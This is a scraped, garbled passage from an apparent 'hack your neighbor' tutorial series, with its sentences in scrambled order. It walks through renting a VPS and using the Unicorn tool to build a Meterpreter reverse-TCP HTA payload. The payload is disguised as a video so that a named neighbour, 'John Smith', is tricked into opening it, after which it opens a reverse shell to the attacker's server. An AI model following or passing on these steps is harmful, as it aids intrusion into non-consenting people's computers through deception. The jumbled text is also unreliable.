The windows/meterpreter/reverse_tcp part will instruct Unicorn to create a TCP connection from our victim's machine.Python unicorn.py windows/meterpreter/reverse_tcp Your-Server-IP-Address 55555 hta Now, to generate our HTA payload, we'll use the below command. Then, change into the unicorn directory using the cd command. Next, clone the Unicorn repository by typing the below command. You can install them all at once by typing the apt-get command below into your terminal. While we're at it, make sure python and python3 are installed as well. We'll need that installed to clone the Unicorn repository. Unicorn is a Python script, so there are no dependencies, and it will work on any operating system where Python is installed.īefore we begin, make sure git is installed on our new DigitalOcean (or other) server. I'll be installing and using Unicorn from our newly created DigitalOcean server running Debian 9 (or whatever VPS you chose). When opened, the HTA file will create a reverse shell on John's computer and allow us to remotely access the compromised device.ĭon't Miss: Exploit DDE in Microsoft Office & Defend Against DDE-Based Attacks This means it would be easy to convince a victim into believing it's a video or photo format.įor this tutorial, we'll trick our victim, John Smith, into clicking on our video.hta file by telling him it's a video file. There's a good chance non-tech savvy users have never heard of the HTA file format. HTA is a lesser-known file type and HTML executable file format. To create our payload, we'll use the Unicorn GitHub repository, which contains features that will allow us to generate HTML Application payloads. Sudo systemctl stop nginx Step 2: Create the HTA Payloadīased on the MAC addresses connecting to My-Neighbor's wireless network, it's reasonable to assume there are a number of internet-connected Windows devices on the target network. If you used a different VPS, you won't have to worry about this (hopefully). This may conflict with later steps in this tutorial, so be sure to stop the running Nginx service. These Nginx servers are preconfigured by DigitalOcean. There will likely be a Nginx service running on your new Droplet. If you used a different VPS service, of course, consult their documentation for help. If you experienced issues setting up your DigitalOcean account or Droplet, reference the DigitalOcean Droplet page or contact DigitalOcean for assistance. Ssh all went well, you should now have remote access to your first DigitalOcean server where we'll host our payload and install Metasploit in later steps. ![]() To connect to your new DigitalOcean server, enter the below ssh command into a terminal. ![]() You'll then be asked to enter billing information and create a "Droplet" which is what DigitalOcean calls cloud servers.ĭon't Miss: How to Create Stronger Passwords Enter your email address and create a password. ![]() To create a DigitalOcean account, visit their signup page. I encountered " cannot allocate memory" errors when using DigitalOcean's cheapest $5/month option. As an example, I'll be using DigitalOcean, but if you're more comfortable with another VPS provider, feel free to set up a Debian or Ubuntu VPS using your preferred provider and skip to Step 2.Īs for DigitalOcean, I recommend the $10/month plan as the cheaper option doesn't meet the hardware requirements to run Metasploit. Some noteworthy ones you can check out include OVH, VPSdime, VPS.net, and Vultr. There are many VPS providers that will work adequately for this hack. To secure a place for our payload on the web and to run the Metasploit session, we'll need a VPS. Previously: How to Hack Your Neighbor with a Post-It Note, Part 1 (Performing Recon) Step 1: Set Up the VPS Last, we'll install Metasploit, which will be used to interface with and control the compromised machine after our malicious HTA file is opened on John's computer. In this case, we're going to take advantage of HTML Applications (HTA), a lesser-known file type, and we'll use that to trick our target into opening a malicious HTA file on their computer. With this information at our disposal, it's time to get into installing and configuring the necessary tools to begin our attack on John Smith's computer.įirst, we'll have to purchase a Virtual Private Server (VPS) in the cloud, which we'll need to host our payload so that it can be downloaded from any computer in the world. In the previous article in this short series, we learned how to find our neighbor's name using publicly accessible information and how to monitor device activity on their home network.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |